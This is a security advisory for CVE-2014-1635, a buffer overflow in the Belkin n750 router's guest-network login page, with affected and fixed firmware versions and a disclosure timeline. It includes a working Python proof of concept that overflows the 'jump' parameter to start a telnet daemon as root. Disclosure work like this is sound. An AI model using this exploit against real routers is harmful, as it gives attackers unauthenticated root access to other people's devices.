1. Vulnerability Properties
Title: Belkin n750 buffer overflow
CVE ID: CVE-2014-1635
CVSSv2 Base Score: 10 (AV:N/AC:L/AU:N/C:P/I:N/A:N)
Vendor: BELKIN (http://www.belkin.com/)
Products: n750/F9K1103
Advisory Release Date: 2014-11-04
Advisory URL: https://labs.integrity.pt/advisories/CVE-2014-1635/
Credits: Discovery and PoC by Marco Vaz <mv[at]integrity.pt>
2. Vulnerability Summary
A remote unauthenticated attacker may execute commands as root by sending an unauthenticated crafted POST request to the httpd that serves authentication on the guest login network.
3. Technical Details
The vulnerability can be confirmed by sending a crafted POST request where the parameter “jump” takes 1379 bytes of padding concatenated with the commands to be executed and with content different from zero to overwrite an internal control variable.
The following POC code can be used to verify the vulnerability:
#!/usr/bin/python
#Title : Belkin n750 buffer overflow in jump login parameter
#Date : 28 Jan 2014
#Author : Discovered and developed by Marco Vaz <mv@integrity.pt>
#Testd on: Firmware: 1.10.16m (2012/9/14 6:6:56) / Hardware : F9K1103 v1 (01C)import httplib
headers = {}
body= "GO=&jump="+ "a"*1379 +"%3b"+ "/usr/sbin/utelnetd -d" +"%3b&pws=\n\n"
conn = httplib.HTTPConnection("192.168.169.1",8080)
conn.request("POST", "/login.cgi", body, headers)
response = conn.getresponse()
data = response.read()
print data
4. Vulnerable Versions
Confirmed on Belkin n750 F9K1103_WW_1.10.16m.
5. Solution
Upgrade to Belkin n750 F9K1103_WW_1.10.17m.
6. Vulnerability Timeline
24 Jan 2014 – Reported to Vendor
28 Jan 2014 – Sent POC code
31 Mar 2014 – Vendor released new firmware version
© 2024 INTEGRITY S.A. All rights reserved. | Cookie Policy